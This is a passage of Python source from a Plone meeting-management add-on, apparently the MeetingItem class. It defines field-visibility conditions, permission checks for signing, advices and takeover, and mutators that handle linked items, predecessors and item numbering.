cfg.getWorkflowAdaptations()\n return 'accepted_out_of_meeting' in wfAdaptations or \\\n 'accepted_out_of_meeting_and_duplicated' in wfAdaptations\n\n security.declarePublic('showEmergency')\n\n def showEmergency(self):\n '''Show the MeetingItem.emergency field if :\n - in usedItemAttributes;\n - or if WFAdaptation 'accepted_out_of_meeting_emergency' or\n 'accepted_out_of_meeting_emergency_and_duplicated' is enabled;\n - and hide it if isDefinedInTool.'''\n res = False\n if self.attribute_is_used('emergency'):\n res = True\n else:\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n wfAdaptations = cfg.getWorkflowAdaptations()\n res = ('accepted_out_of_meeting_emergency' in wfAdaptations or\n 'accepted_out_of_meeting_emergency_and_duplicated' in wfAdaptations) and \\\n not self.isDefinedInTool()\n return res\n\n security.declarePublic('showMeetingManagerReservedField')\n\n def showMeetingManagerReservedField(self, name):\n '''When must field named p_name be shown?'''\n # show field if it is a recurring item or an item template\n # especially done so item template managers may manage it\n if self.isDefinedInTool() and \\\n self.attribute_is_used(name) and \\\n _checkPermission(WriteItemMeetingManagerFields, self):\n return True\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n return cfg.show_meeting_manager_reserved_field(name, meta_type='MeetingItem')\n\n security.declarePublic('showOralQuestion')\n\n def showOralQuestion(self):\n '''On edit, show if field enabled and if current user isManager.'''\n res = False\n if self.attribute_is_used('oralQuestion'):\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n res = tool.isManager(cfg)\n return res\n\n security.declarePublic('showToDiscuss')\n\n def showToDiscuss(self):\n '''On edit or view page for an item, we must show field 'toDiscuss' if :\n - field is used and :\n - MeetingConfig.toDiscussSetOnItemInsert is False or;\n - MeetingConfig.toDiscussSetOnItemInsert is True and item is linked\n to a meeting.'''\n res = False\n if self.attribute_is_used('toDiscuss'):\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n res = (not cfg.getToDiscussSetOnItemInsert() or\n (not self.isDefinedInTool() and\n cfg.getToDiscussSetOnItemInsert() and\n self.hasMeeting()))\n return res\n\n security.declarePublic('showItemIsSigned')\n\n def showItemIsSigned(self):\n '''Condition for showing the 'itemIsSigned' field on views.\n The attribute must be used and the item must be decided.'''\n return self.attribute_is_used('itemIsSigned') and \\\n (self.hasMeeting() or self.query_state() == 'validated')\n\n security.declarePublic('mayChangeListType')\n\n def mayChangeListType(self):\n '''Condition for editing 'listType' field.'''\n item = self.getSelf()\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(item)\n if item.hasMeeting() and tool.isManager(cfg):\n return True\n return False\n\n security.declarePublic('mayChangePollType')\n\n def mayChangePollType(self):\n '''Condition for editing 'pollType' field.'''\n item = self.getSelf()\n res = False\n if _checkPermission(ModifyPortalContent, item):\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(item)\n if not item.hasMeeting() or tool.isManager(cfg):\n res = True\n return res\n\n security.declarePublic('maySignItem')\n\n def maySignItem(self):\n '''Condition for editing 'itemIsSigned' field.\n As the item signature comes after the item is decided/closed,\n we use an unrestricted call in @@toggle_item_is_signed that is protected by\n this method.'''\n item = self.getSelf()\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(item)\n\n # bypass for the Manager role\n if tool.isManager(realManagers=True):\n return True\n\n # Only MeetingManagers can sign an item if it is decided\n if not item.showItemIsSigned() or \\\n not tool.isManager(cfg):\n return False\n\n # If the meeting is in a closed state, the item can only be signed but\n # not \"unsigned\". This way, a final state 'signed' exists for the item\n meeting = item.getMeeting()\n if meeting and \\\n meeting.query_state() in Meeting.MEETINGCLOSEDSTATES and \\\n item.getItemIsSigned():\n return False\n return True\n\n security.declarePublic('mayTakeOver')\n\n def mayTakeOver(self):\n '''Check doc in interfaces.py.'''\n wfTool = api.portal.get_tool('portal_workflow')\n item = self.getSelf()\n res = False\n # user have WF transitions to trigger\n if wfTool.getTransitionsFor(item):\n res = True\n else:\n # item is decided and user is member of the proposingGroup\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(item)\n item_state = item.query_state()\n if self.is_decided(cfg, item_state) and \\\n item.adapted()._getGroupManagingItem(item_state, theObject=False) in \\\n tool.get_orgs_for_user():\n res = True\n return res\n\n security.declareProtected(ModifyPortalContent, 'setTakenOverBy')\n\n def setTakenOverBy(self, value, **kwargs):\n '''Override MeetingItem.takenOverBy mutator so we can manage\n history stored in 'takenOverByInfos'.\n We can receive a 'wf_state' in the kwargs, then needs to have format like :\n config_workflowname__wfstate__wfstatename.'''\n # Add a place to store takenOverBy by review_state user id\n # as we override mutator, this method is called before ObjectInitializedEvent\n # do not manage history while creating a new item\n if not self._at_creation_flag:\n # save takenOverBy to takenOverByInfos for current review_state\n # or check for a wf_state in kwargs\n if 'wf_state' in kwargs:\n wf_state = kwargs['wf_state']\n else:\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n wf_state = \"%s__wfstate__%s\" % (cfg.getItemWorkflow(), self.query_state())\n if value:\n self.takenOverByInfos[wf_state] = value\n elif not value and wf_state in self.takenOverByInfos:\n del self.takenOverByInfos[wf_state]\n self.getField('takenOverBy').set(self, value, **kwargs)\n\n security.declarePublic('setHistorizedTakenOverBy')\n\n def setHistorizedTakenOverBy(self, wf_state):\n '''Check doc in interfaces.py.'''\n item = self.getSelf()\n\n if wf_state in item.takenOverByInfos:\n previousUserId = item.takenOverByInfos[wf_state]\n previousUser = api.user.get(previousUserId)\n mayTakeOver = False\n if previousUser:\n # do this as previousUser\n # remove AUTHENTICATED_USER during adopt_user to avoid\n # breaking utils.get_current_user_id\n auth_user = item.REQUEST.get(\"AUTHENTICATED_USER\")\n if auth_user:\n item.REQUEST[\"AUTHENTICATED_USER\"] = None\n with api.env.adopt_user(user=previousUser):\n try:\n mayTakeOver = item.adapted().mayTakeOver()\n except Exception:\n logger.warning(\n \"An error occured in 'setHistorizedTakenOverBy' \"\n \"while evaluating 'mayTakeOver'\")\n if auth_user:\n item.REQUEST[\"AUTHENTICATED_USER\"] = auth_user\n if not mayTakeOver:\n item.setTakenOverBy('')\n else:\n item.setTakenOverBy(previousUserId)\n else:\n item.setTakenOverBy('')\n\n security.declarePublic('mayTransfer')\n\n def mayTransfer(self):\n '''Check doc in interfaces.py.'''\n item = self.getSelf()\n res = False\n if item.getOtherMeetingConfigsClonableTo():\n tool = api.portal.get_tool('portal_plonemeeting')\n res = tool.isManager(tool.getMeetingConfig(item))\n return res\n\n security.declarePublic('mayAskEmergency')\n\n def mayAskEmergency(self):\n '''Check doc in interfaces.py.'''\n # by default, everybody able to edit the item can ask emergency\n item = self.getSelf()\n if item.isDefinedInTool():\n return False\n\n if _checkPermission(ModifyPortalContent, item):\n return True\n\n security.declarePublic('mayAcceptOrRefuseEmergency')\n\n def mayAcceptOrRefuseEmergency(self):\n '''Check doc in interfaces.py.'''\n # by default, only MeetingManagers can accept or refuse emergency\n item = self.getSelf()\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(item)\n if tool.isManager(cfg) and _checkPermission(ModifyPortalContent, item):\n return True\n return False\n\n security.declarePublic('mayEvaluateCompleteness')\n\n def mayEvaluateCompleteness(self):\n '''Check doc in interfaces.py.'''\n # user must be able to edit current item\n item = self.getSelf()\n if item.isDefinedInTool():\n return False\n\n res = False\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(item)\n # user must be an item completeness editor (one of corresponding role)\n if _checkPermission(ModifyPortalContent, item) and \\\n (tool.userIsAmong(ITEM_COMPLETENESS_EVALUATORS) or tool.isManager(cfg)):\n res = True\n return res\n\n security.declarePublic('mayAskCompletenessEvalAgain')\n\n def mayAskCompletenessEvalAgain(self):\n '''Check doc in interfaces.py.'''\n # user must be able to edit current item\n item = self.getSelf()\n if item.isDefinedInTool():\n return\n\n res = False\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(item)\n # user must be an item completeness editor (one of corresponding role)\n if item.getCompleteness() == 'completeness_incomplete' and \\\n _checkPermission(ModifyPortalContent, item) and \\\n (tool.userIsAmong(ITEM_COMPLETENESS_ASKERS) or tool.isManager(cfg)):\n res = True\n return res\n\n def _is_complete(self):\n '''Check doc in interfaces.py.'''\n item = self.getSelf()\n return item.getCompleteness() in ('completeness_complete',\n 'completeness_evaluation_not_required')\n\n security.declarePublic('mayEditAdviceConfidentiality')\n\n def mayEditAdviceConfidentiality(self, org_uid):\n '''Check doc in interfaces.py.'''\n item = self.getSelf()\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(item)\n # user must be able to edit the item and must be a Manager\n if item.adviceIsInherited(org_uid) or \\\n not _checkPermission(ModifyPortalContent, item) or \\\n not tool.isManager(cfg):\n return False\n return True\n\n def adviceIsInherited(self, org_uid):\n \"\"\" \"\"\"\n res = False\n if self.adviceIndex.get(org_uid) and \\\n self.adviceIndex[org_uid]['inherited']:\n res = True\n return res\n\n security.declarePublic('mayAskAdviceAgain')\n\n def mayAskAdviceAgain(self, advice):\n '''Returns True if current user may ask given p_advice advice again.\n For this :\n - advice must not be 'asked_again', inherited or not_asked (initiative);\n - item is editable by current user (Manager and MeetingManager) or\n using WFA \"waiting_advices_proposing_group_send_back\" and current\n user is member of the proposingGroup able to send item back in WF.'''\n\n item = self.getSelf()\n adviser_uid = advice.advice_group\n\n if advice.advice_type == 'asked_again' or \\\n item.adviceIsInherited(adviser_uid) or \\\n item.adviceIndex[adviser_uid][\"not_asked\"]:\n return False\n\n # (Meeting)Managers\n if _checkPermission(ModifyPortalContent, item):\n return True\n # _waiting_advices\n item_state = item.query_state()\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(item)\n if item_state.endswith(\"_waiting_advices\") and \\\n \"waiting_advices_proposing_group_send_back\" in cfg.getWorkflowAdaptations() and \\\n item.adviceIndex[adviser_uid][\"advice_editable\"]:\n # check that current user is member of the proposingGroup suffix\n # to which the item state could go back to\n org_uid = self._getGroupManagingItem(item_state)\n # get the \"back\" states, item_state is like \"proposed_waiting_advices\"\n # of \"itemcreated__or__proposed_waiting_advices\"\n # or when using WAITING_ADVICES_FROM_STATES 'new_state_id',\n # we use the \"from_states\"\n states = item_state.replace(\"_waiting_advices\", \"\")\n if \"__or__\" in states:\n states = states.split(\"__or__\")\n else:\n found = False\n for infos in get_waiting_advices_infos(cfg.getId()):\n if infos['new_state_id'] == states:\n states = infos['new_state_id']\n break\n if not found:\n # make sure we have a list\n states = [states]\n suffixes = cfg.getItemWFValidationLevels(\n states=states, data='suffix', only_enabled=True, return_state_singleton=False)\n if tool.user_is_in_org(org_uid=org_uid, suffixes=suffixes):\n return True\n return False\n\n security.declarePublic('mayBackToPreviousAdvice')\n\n def mayBackToPreviousAdvice(self, advice):\n '''Returns True if current user may go back to previous given advice.\n It could be the case if someone asked advice again erroneously\n or for any other reason.\n For this :\n - advice must be 'asked_again'...;\n - advice is no more editable (except for MeetingManagers);\n - item is editable by current user (including MeetingManagers).'''\n\n item = self.getSelf()\n\n if not advice.advice_type == 'asked_again':\n return False\n\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(item)\n\n # apart MeetingManagers, the advice can not be set back to previous\n # if editable by the adviser\n if item.adviceIndex[advice.advice_group]['advice_editable'] and \\\n not tool.isManager(cfg):\n return False\n\n if _checkPermission(ModifyPortalContent, item):\n return True\n return False\n\n security.declareProtected(ModifyPortalContent, 'setItemIsSigned')\n\n def setItemIsSigned(self, value, **kwargs):\n '''Overrides the field 'itemIsSigned' mutator to check if the field is\n actually editable.'''\n # if we are not in the creation process (setting the default value)\n # and if the user can not sign the item, we raise an Unauthorized\n if not self._at_creation_flag and not self.adapted().maySignItem():\n raise Unauthorized\n self.getField('itemIsSigned').set(self, value, **kwargs)\n\n security.declareProtected(ModifyPortalContent, 'setItemNumber')\n\n def setItemNumber(self, value, **kwargs):\n '''Overrides the field 'itemNumber' mutator to\n notifyModified and reindex relevant indexes.'''\n current_item_number = self.getField('itemNumber').get(self, **kwargs)\n if not value == current_item_number:\n self.getField('itemNumber').set(self, value, **kwargs)\n reindex_object(self, idxs=['getItemNumber'], update_metadata=False)\n\n security.declareProtected(ModifyPortalContent, 'setManuallyLinkedItems')\n\n def setManuallyLinkedItems(self, value, caching=True, **kwargs):\n '''Overrides the field 'manuallyLinkedItems' mutator so we synchronize\n field manuallyLinkedItems of every linked items...\n We are using ZCatalog.unrestrictedSearchResults and ZCatalog.unrestrictedSearchResults\n because current member could update manually linked items in which some are not viewable.'''\n stored = self.getField('manuallyLinkedItems').getRaw(self, **kwargs)\n # value sometimes contains an empty string ''...\n if value is None:\n value = ()\n if '' in value:\n value.remove('')\n\n # save value that will be actually stored on self as it will not be value\n # if some extra uids are appended to it because linking to an item\n # that is already linked to other items\n valueToStore = list(value)\n # only compute if something changed\n if not set(stored) == set(value):\n\n # we will use unrestrictedSearchResults because in the case a user update manually linked items\n # and in already selected items, there is an item he can not view, it will be found in the catalog\n unrestrictedSearch = api.portal.get_tool('portal_catalog').unrestrictedSearchResults\n item_infos = {}\n\n def _get_item_infos(item_uid):\n \"\"\"Return meeting_date and item_created data for given p_item_uid.\"\"\"\n if not caching or item_uid not in item_infos:\n item = self if item_uid == self.UID() else None\n if item is None:\n brains = unrestrictedSearch(UID=item_uid)\n if brains:\n # there could be no brains when created from restapi call\n # as new item is still not indexed\n item = brains[0]._unrestrictedGetObject()\n if item:\n meeting = item.getMeeting()\n item_infos[item_uid] = {\n 'item': item,\n 'meeting_date': meeting and meeting.date or None,\n 'item_created': item.created()}\n else:\n item_infos[item_uid] = None\n return item_infos[item_uid]\n\n # sorting method, items will be sorted by meeting date descending\n # then, for items that are not in a meeting date, by creation date\n def _sortByMeetingDate(xUid, yUid):\n '''Sort method that will sort items by meetingDate.\n x and y are uids of items to sort.'''\n item1_infos = _get_item_infos(xUid)\n item1_created = item1_infos['item_created']\n item1_meeting_date = item1_infos['meeting_date']\n item2_infos = _get_item_infos(yUid)\n item2_created = item2_infos['item_created']\n item2_meeting_date = item2_infos['meeting_date']\n if item1_meeting_date and item2_meeting_date:\n # both items have a meeting, compare meeting dates\n return cmp(item2_meeting_date, item1_meeting_date)\n elif item1_meeting_date and not item2_meeting_date:\n # only item1 has a Meeting, it will be displayed after\n return 1\n elif not item1_meeting_date and item2_meeting_date:\n # only item2 has a Meeting, it will be displayed after\n return -1\n else:\n # no meeting at all, sort by item creation date\n return cmp(item1_created, item2_created)\n\n # update every items linked together that are still kept (in value)\n newUids = list(set(value).difference(set(stored)))\n # first build list of new uids that will be appended to every linked items\n newLinkedUids = []\n for newUid in newUids:\n # add every manually linked items of this newUid...\n newItem = _get_item_infos(newUid)['item']\n # getRawManuallyLinkedItems still holds old UID of deleted items\n # so we use getManuallyLinkedItems to be sure that item object still exists\n mLinkedItemUids = [tmp_item.UID() for tmp_item in newItem.getManuallyLinkedItems()]\n for mLinkedItemUid in mLinkedItemUids:\n if mLinkedItemUid not in newLinkedUids:\n newLinkedUids.append(mLinkedItemUid)\n # do not forget newUids\n newLinkedUids = newLinkedUids + newUids\n # we will also store this for self\n valueToStore = list(set(valueToStore).union(newLinkedUids))\n valueToStore.sort(_sortByMeetingDate)\n # for every linked items, also keep back link to self\n newLinkedUids.append(self.UID())\n # now update every item (newLinkedUids + value)\n # make sure we have not same UID several times\n newLinkedUids = set(newLinkedUids).union(value)\n for linkedItemUid in newLinkedUids:\n # self UID is in newLinkedUids but is managed here above, so pass\n if linkedItemUid == self.UID():\n continue\n linkedItem = _get_item_infos(linkedItemUid)['item']\n # do not self reference\n newLinkedUidsToStore = list(newLinkedUids)\n if linkedItemUid in newLinkedUids:\n newLinkedUidsToStore.remove(linkedItemUid)\n newLinkedUidsToStore.sort(_sortByMeetingDate)\n linkedItem.getField('manuallyLinkedItems').set(linkedItem, newLinkedUidsToStore, **kwargs)\n # make change in linkedItem.at_ordered_refs until it is fixed in Products.Archetypes\n linkedItem._p_changed = True\n\n # now if links were removed, remove linked items on every removed items...\n removedUids = set(stored).difference(set(value))\n for removedUid in removedUids:\n removedItemBrains = unrestrictedSearch(UID=removedUid)\n if not removedItemBrains:\n continue\n removedItem = removedItemBrains[0]._unrestrictedGetObject()\n removedItem.getField('manuallyLinkedItems').set(removedItem, [], **kwargs)\n # make change in linkedItem.at_ordered_refs until it is fixed in Products.Archetypes\n removedItem._p_changed = True\n\n # save newUids, newLinkedUids and removedUids in the REQUEST\n # so it can be used by submethods like subscribers\n self.REQUEST.set('manuallyLinkedItems_newUids', newUids)\n self.REQUEST.set('manuallyLinkedItems_newLinkedUids', newLinkedUids)\n self.REQUEST.set('manuallyLinkedItems_removedUids', removedUids)\n\n self.getField('manuallyLinkedItems').set(self, valueToStore, **kwargs)\n # make change in linkedItem.at_ordered_refs until it is fixed in Products.Archetypes\n self._p_changed = True\n\n security.declareProtected(ModifyPortalContent, 'setPreferredMeeting')\n\n def setPreferredMeeting(self, value, **kwargs):\n '''Overrides the field 'preferredMeeting' mutator to be able to\n update_preferred_meeting if value changed.'''\n field = self.getField('preferredMeeting')\n current_value = field.get(self, **kwargs)\n if value != current_value:\n if not value:\n value = ITEM_NO_PREFERRED_MEETING_VALUE\n self._update_preferred_meeting(value)\n field.set(self, value, **kwargs)\n\n def _mark_need_update(self, update_item_references=True, update_committees=True, extra_markers=[]):\n '''See docstring in interfaces.py.'''\n if update_item_references:\n # add a value in the REQUEST to specify that update_item_references is needed\n self.REQUEST.set('need_Meeting_update_item_references', True)\n if update_committees:\n # add a value in the REQUEST to specify that update_committees is needed\n self.REQUEST.set('need_MeetingItem_update_committees', True)\n for extra_marker in extra_markers:\n self.REQUEST.set(extra_marker, True)\n\n def _annex_decision_addable_states_after_validation(self, cfg, item_state):\n '''See doc in interfaces.py.'''\n return cfg.getItemDecidedStates()\n\n def may_add_annex_decision(self, cfg, item_state):\n \"\"\" \"\"\"\n addable_states = self.adapted()._annex_decision_addable_states_after_validation(cfg, item_state)\n return addable_states == \"*\" or item_state in addable_states\n\n security.declareProtected(ModifyPortalContent, 'setCategory')\n\n def setCategory(self, value, **kwargs):\n '''Overrides the field 'category' mutator to be able to\n update_item_references if value changed.'''\n field = self.getField('category')\n current_value = field.get(self, **kwargs)\n if value != current_value:\n # add a value in the REQUEST to specify that update_groups_in_charge is needed\n self._mark_need_update(extra_markers=['need_MeetingItem_update_groups_in_charge_category'])\n field.set(self, value, **kwargs)\n\n security.declareProtected(ModifyPortalContent, 'setClassifier')\n\n def setClassifier(self, value, **kwargs):\n '''Overrides the field 'classifier' mutator to be able to\n update_item_references if value changed.'''\n field = self.getField('classifier')\n current_value = field.get(self, **kwargs)\n if value != current_value:\n # add a value in the REQUEST to specify that update_groups_in_charge is needed\n self._mark_need_update(extra_markers=['need_MeetingItem_update_groups_in_charge_classifier'])\n field.set(self, value, **kwargs)\n\n security.declareProtected(ModifyPortalContent, 'setProposingGroup')\n\n def setProposingGroup(self, value, **kwargs):\n '''Overrides the field 'proposingGroup' mutator to be able to\n update_item_references if value changed.'''\n field = self.getField('proposingGroup')\n current_value = field.get(self, **kwargs)\n if value != current_value:\n # add a value in the REQUEST to specify that update_groups_in_charge is needed\n self._mark_need_update(extra_markers=['need_MeetingItem_update_groups_in_charge_proposing_group'])\n field.set(self, value, **kwargs)\n\n security.declareProtected(ModifyPortalContent, 'setProposingGroupWithGroupInCharge')\n\n def setProposingGroupWithGroupInCharge(self, value, **kwargs):\n '''Overrides the field 'proposingGroupWithGroupInCharge' mutator to be able to\n set a correct 'proposingGroup' and 'groupsInCharge' from received value.'''\n field = self.getField('proposingGroupWithGroupInCharge')\n current_value = field.get(self, **kwargs)\n if not value == current_value:\n # value may be empty if used on an itemTemplate\n proposingGroup = groupInCharge = ''\n if value:\n proposingGroup, groupInCharge = value.split('__groupincharge__')\n self.setProposingGroup(proposingGroup)\n self.setGroupsInCharge([groupInCharge])\n field.set(self, value, **kwargs)\n\n def _adaptLinesValueToBeCompared(self, value):\n \"\"\"'value' received from processForm does not correspond to what is stored\n for LinesField, we need to adapt it so it may be compared.\n This is completly taken from Products.Archetypes.Field.LinesField.set.\"\"\"\n\n if isinstance(value, basestring):\n value = value.split('\\n')\n value = [v for v in value if v and v.strip()]\n return tuple(value)\n\n security.declareProtected(ModifyPortalContent, 'setOtherMeetingConfigsClonableTo')\n\n def setOtherMeetingConfigsClonableTo(self, value, **kwargs):\n '''Overrides the field 'otherMeetingConfigsClonableTo' mutator to be able to\n update_item_references if value changed.'''\n field = self.getField('otherMeetingConfigsClonableTo')\n current_value = field.get(self, **kwargs)\n if self._adaptLinesValueToBeCompared(value) != current_value:\n # add a value in the REQUEST to specify that update_item_references is needed\n self._mark_need_update(update_committees=False)\n field.set(self, value, **kwargs)\n\n security.declareProtected(View, 'getManuallyLinkedItems')\n\n def getManuallyLinkedItems(self, only_viewable=False, **kwargs):\n '''Overrides the field 'manuallyLinkedItems' accessor to be able\n to return only items for that are viewable by current user.'''\n linkedItems = self.getField('manuallyLinkedItems').get(self, **kwargs)\n if linkedItems:\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n linkedItems = [\n linkedItem for linkedItem in linkedItems if\n self._appendLinkedItem(\n linkedItem, tool, cfg, only_viewable=only_viewable)]\n return linkedItems\n\n security.declarePublic('onDiscussChanged')\n\n def onDiscussChanged(self, toDiscuss):\n '''See doc in interfaces.py.'''\n pass\n\n security.declarePublic('isDefinedInTool')\n\n def isDefinedInTool(self, item_type=None):\n '''Is this item being defined in the tool (portal_plonemeeting) ?\n p_item_type can be :\n - None, we return True for any item defined in the tool;\n - 'recurring', we return True if it is a recurring item defined in the tool;\n - 'itemtemplate', we return True if it is an item template defined in the tool.'''\n is_in_tool = 'portal_plonemeeting' in self.absolute_url()\n if item_type is None:\n return is_in_tool\n elif item_type == 'recurring':\n return is_in_tool and self.portal_type.startswith('MeetingItemRecurring')\n elif item_type == 'itemtemplate':\n return is_in_tool and self.portal_type.startswith('MeetingItemTemplate')\n\n security.declarePublic('showClonableToOtherMCs')\n\n def showClonableToOtherMCs(self):\n '''Returns True if the current item can be cloned to another\n meetingConfig. This method is used as a condition for showing\n or not the 'otherMeetingConfigsClonableTo' field.'''\n res = False\n if self.getOtherMeetingConfigsClonableTo():\n res = True\n else:\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n res = cfg.getMeetingConfigsToCloneTo()\n return res\n\n security.declarePublic('showAdvancedClonableToOtherMCs')\n\n def showAdvancedClonableToOtherMCs(self, showClonableToOtherMCs=False):\n '''Display otherMeetingConfigsClonableTo as advanced or not.\n Functionnality enabled and using relevant otherMeetingConfigsClonableToFieldXXX are used.'''\n item = self.getSelf()\n res = False\n if showClonableToOtherMCs:\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(item)\n res = bool(self.get_enable_clone_to_other_mc_fields(cfg))\n return res\n\n security.declarePublic('getItemNumber')\n\n def getItemNumber(self, relativeTo='meeting', for_display=False, **kwargs):\n '''This accessor for 'itemNumber' field is overridden in order to allow\n to get the item number in various flavours:\n - the item number relative to the whole meeting (no matter the item\n being \"normal\" or \"late\"): p_relativeTo=\"meeting\";\n - the item number relative to the whole meeting config:\n p_relativeTo=\"meetingConfig\".\n If p_for_display is True, it will return a displayable value :\n - 100 is displayed '1';\n - 102 is displayed '1.2';\n - 111 is displayed '1.11'.'''\n # when 'field' and 'encoding' in kwargs, it means that getRaw is called\n if 'field' in kwargs and 'encoding' in kwargs:\n return self.getField('itemNumber').get(self, **kwargs)\n\n # this method is only relevant if the item is in a meeting\n if not self.hasMeeting():\n return 0\n\n res = self.getField('itemNumber').get(self, **kwargs)\n if relativeTo == 'meetingConfig':\n meeting = self.getMeeting()\n meetingFirstItemNumber = meeting.first_item_number\n if meetingFirstItemNumber != -1:\n res = meetingFirstItemNumber * 100 + self.getItemNumber(relativeTo='meeting') - 100\n else:\n # here we need to know what is the \"base number\" to compute the item number on :\n # we call findBaseNumberRelativeToMeetingConfig, see docstring there\n # call the view on meeting because it is memoized and for example in meeting_view\n # the meeting does not change but the item does\n view = getMultiAdapter((meeting, self.REQUEST), name='pm_unrestricted_methods')\n currentMeetingComputedFirstNumber = view.findFirstItemNumber()\n # now that we have the currentMeetingComputedFirstNumber, that is\n # the theorical current meeting first number, we can compute current item\n # number that is this number + current item number relativeTo the meeting - 1\n res = currentMeetingComputedFirstNumber * 100 + self.getItemNumber(relativeTo='meeting') - 100\n # we want '1' instead of '100' and '2.15' instead of 215\n if for_display:\n return _storedItemNumber_to_itemNumber(res, forceShowDecimal=False)\n return res\n\n security.declarePublic('getDefaultToDiscuss')\n\n def getDefaultToDiscuss(self):\n '''Get default value for field 'toDiscuss' from the MeetingConfig.'''\n res = True\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n if cfg:\n # When creating a meeting through invokeFactory (like recurring\n # items), getMeetingConfig does not work because the Archetypes\n # object is not properly initialized yet (portal_type is not set\n # correctly yet)\n res = cfg.getToDiscussDefault()\n return res\n\n security.declarePublic('getDefaultPollType')\n\n def getDefaultPollType(self):\n '''Get default value for field 'pollType' from the MeetingConfig.'''\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n return cfg.getDefaultPollType()\n\n def _update_meeting_link(self, meeting):\n \"\"\"Store the linked meeting UID and path.\n Storing the path is required for the indexation\n because a clear_and_rebuild would not find the element by UID.\"\"\"\n self.linked_meeting_uid = None\n self.linked_meeting_path = None\n if meeting is not None:\n self.linked_meeting_uid = meeting.UID()\n self.linked_meeting_path = \"/\".join(meeting.getPhysicalPath())\n\n def _update_preferred_meeting(self, preferred_meeting_uid):\n \"\"\"Store the preferred meeting UID and path.\n Storing the path is required for the indexation\n because a clear_and_rebuild would not find the element by UID.\"\"\"\n self.preferred_meeting_path = None\n if preferred_meeting_uid != ITEM_NO_PREFERRED_MEETING_VALUE:\n meeting_brain = uuidToCatalogBrain(preferred_meeting_uid, unrestricted=True)\n # necessary for restapi as value is set before being validated...\n # if passing a wrong value, meeting_brain is an empty result\n if meeting_brain:\n self.preferred_meeting_path = meeting_brain.getPath()\n\n def _update_predecessor(self, predecessor):\n '''Only one predecessor possible but several successors.\n If p_predecessor=None, we remove predecessor/successors attributes.\n Storing the path is required for the indexation\n because a clear_and_rebuild would not find the element by UID.'''\n if predecessor is not None:\n self.linked_predecessor_uid = predecessor.UID()\n self.linked_predecessor_path = \"/\".join(predecessor.getPhysicalPath())\n if not getattr(predecessor, 'linked_successor_uids', None):\n predecessor.linked_successor_uids = PersistentList()\n # update successors for predecessor\n predecessor.linked_successor_uids.append(self.UID())\n else:\n safe_delattr(self, 'linked_predecessor_uid')\n safe_delattr(self, 'linked_predecessor_path')\n safe_delattr(self, 'linked_successor_uids')\n\n def get_successor(self, the_objects=True, unrestricted=True):\n \"\"\"Shortcut to get the last successors that should be the official successor.\"\"\"\n # we force ordered=True for get_successors to make sure the last successor\n # is the last chronologically created\n successors = self.get_successors(\n the_objects=the_objects, ordered=True, unrestricted=unrestricted)\n return successors and successors[-1] or None\n\n def get_successors(self, the_objects=True, ordered=True, unrestricted=True):\n '''Return the successors, so the items that were automatically linked to self.\n Most of times, there will be one single successor, but it may happen\n that several successors exist, for example when item delayed then corrected\n then delayed again, most of time one of the 2 successors will be deleted\n but it is not always the case...'''\n res = getattr(self, 'linked_successor_uids', [])\n if res and the_objects:\n # res is a PersistentList, not working with catalog query\n # searching successors ordered will make sure that items are returned chronologically\n res = uuidsToObjects(uuids=tuple(res), ordered=ordered, unrestricted=unrestricted)\n return res\n\n def get_every_successors(obj, the_objects=True, unrestricted=True):\n '''Loop recursievely thru every successors of p_obj and return it.'''\n def recurse_successors(successors, res=[]):\n for successor in successors:\n res.append(successor)\n recurse_successors(successor.get_successors())\n return res\n res = recurse_successors(obj.get_successors(\n the_objects=the_objects, unrestricted=unrestricted))\n return res\n\n def get_predecessor(self, the_object=True, unrestricted=True):\n ''' '''\n res = getattr(self, 'linked_predecessor_uid', None)\n if res and the_object:\n portal = api.portal.get()\n predecessor_path = self.linked_predecessor_path\n res = portal.unrestrictedTraverse(predecessor_path)\n return res\n\n security.declarePublic('get_predecessors')\n\n def get_predecessors(self, only_viewable=False, include_successors=True):\n '''See doc in interfaces.py.'''\n item = self.getSelf()\n\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(item)\n predecessor = item.get_predecessor()\n predecessors = []\n # retrieve every predecessors\n while predecessor:\n if item._appendLinkedItem(predecessor, tool, cfg, only_viewable=only_viewable):\n predecessors.append(predecessor)\n predecessor = predecessor.get_predecessor()\n # keep order\n predecessors.reverse()\n # retrieve successors too\n if include_successors:\n successors = item.get_every_successors()\n successors = [successor for successor in successors\n if item._appendLinkedItem(successor, tool, cfg, only_viewable)]\n predecessors += successors\n return predecessors\n\n security.declarePublic('displayLinkedItem')\n\n def displayLinkedItem(self, item):\n '''Return a HTML structure to display a linked item.'''\n tool = api.portal.get_tool('portal_plonemeeting')\n meeting = item.hasMeeting()\n # display the meeting date if the item is linked to a meeting\n if meeting:\n title = item.Title(withMeetingDate=True)\n return tool.getColoredLink(item,\n showColors=True,\n showContentIcon=True,\n contentValue=title)\n else:\n # try to share cache of getPrettyLink\n return item.getPrettyLink()\n\n def getMeeting(self, only_uid=False, caching=True):\n '''Returns the linked meeting if it 